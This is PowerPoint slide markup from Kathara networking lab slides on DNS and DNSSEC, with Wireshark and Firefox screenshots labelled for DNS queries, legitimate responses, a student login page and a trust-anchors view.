              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6E0D58D-9D6A-6257-4E0A-156B006273F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84317" y="1259632"/>
            <a:ext cx="8823366" cy="5173699"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F29A766-F281-E2CB-D47E-21692879B8EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00428F65-851B-7403-931B-9D8F6DA02CAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD38AF93-0ADB-B5DD-B105-282B6D9E27CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1476270" y="2696702"/>
            <a:ext cx="2782277" cy="732298"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 75021"/>
              <a:gd name="adj2" fmla="val 147049"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800"/>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0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>enter the student's ID number</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A0C1B53-FC32-00AB-DAE6-8BC1CA82134C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6737775" y="3632866"/>
            <a:ext cx="2782277" cy="732298"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -99549"/>
              <a:gd name="adj2" fmla="val 75004"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800"/>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0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>enter the student's password</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB6B92D3-3523-A5B7-7C9E-732178F79F64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1581905" y="5232219"/>
            <a:ext cx="2782277" cy="732298"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 105752"/>
              <a:gd name="adj2" fmla="val -95269"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800"/>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0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>access the student's reserved area</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="159144561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4C0F111-F68D-2D95-E7BF-94910BEB1DCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>firefox</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Segnaposto contenuto 6" descr="Immagine che contiene testo, schermata, Software multimediale, software">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA14B6D0-FE22-959A-CAD9-951B12FF9FB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19904" y="1046853"/>
            <a:ext cx="9152191" cy="5406338"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4193B0F-6E12-69BD-11E1-8F84634AE5A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>last update: Nov 2025</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D6DF4AF-9EFF-9D3F-9F8C-37156446831D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT"/>
              <a:t>kathara – [ lab: basic-ipv4 ]</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E45F7619-1B77-1D92-842B-C93A2B9E4B37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6953832" y="1972556"/>
            <a:ext cx="2782277" cy="434594"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -92719"/>
              <a:gd name="adj2" fmla="val -128632"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800"/>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0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>legitimate web server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="278011900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B886A8-CB5C-FE6A-EA15-04DB14E66781}"/>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724E885E-CC46-1513-8F56-900CE5234915}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>wireshark</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F036C88-16D6-BC8D-6FA3-27E08CF02EC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>last update: Nov 2025</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FA59C82-FBBA-1D03-F92D-381BB9E99039}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT"/>
              <a:t>kathara – [ lab: basic-ipv4 ]</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Segnaposto contenuto 10" descr="Immagine che contiene testo, schermata, software, schermo">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB943616-EA36-BF8A-9151-22551B1F994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11612" y="1029964"/>
            <a:ext cx="10368775" cy="5351975"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E86F98A-952B-7C95-59F0-8D13CE670BD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9265137" y="2495071"/>
            <a:ext cx="2782277" cy="434594"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -92719"/>
              <a:gd name="adj2" fmla="val -128632"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800"/>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0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>DNS query packet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D64C1456-CB4D-0132-7FAA-91396CB67069}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4745021" y="4074487"/>
            <a:ext cx="3104568" cy="746893"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -108753"/>
              <a:gd name="adj2" fmla="val 37851"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800"/>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0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>the name searched in the DNS query (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Qname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="403139867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711DE66-CEE2-8B38-42CA-17FFBB32F89E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>wireshark</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Segnaposto contenuto 6" descr="Immagine che contiene testo, software, Icona del computer, Pagina Web&#10;&#10;Il contenuto generato dall'IA potrebbe non essere corretto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAEC6B44-6275-A936-45C2-2649B1DC39A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65992" y="1012979"/>
            <a:ext cx="10516408" cy="5428178"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE1E710D-5894-8980-293F-92E738C4DE9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>last update: Nov 2025</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49723B61-459B-2DC7-F54C-1913627E7FE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT"/>
              <a:t>kathara – [ lab: basic-ipv4 ]</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18396C9F-AD7D-7B46-A555-286AF7251359}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6633198" y="5095765"/>
            <a:ext cx="2782277" cy="749255"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -92719"/>
              <a:gd name="adj2" fmla="val -90593"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800"/>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0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>DNS response with legitimate IP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56E5DAF3-EBAA-5373-D96C-96AD79EFE400}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8800123" y="3198503"/>
            <a:ext cx="2782277" cy="434594"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 19535"/>
              <a:gd name="adj2" fmla="val -308978"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800"/>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0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>DNS response packet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="97386626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39B4D6-D420-3DAB-F20B-61CEC68DCCB0}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16386" name="Titolo 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C0F7EF2-3E24-14C6-F5D3-66B79742794B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>trust-anchors view</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16387" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9FBA045-1466-4FF3-CBB8-92072BC82D9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>pc4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>let's see the trust-anchors</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
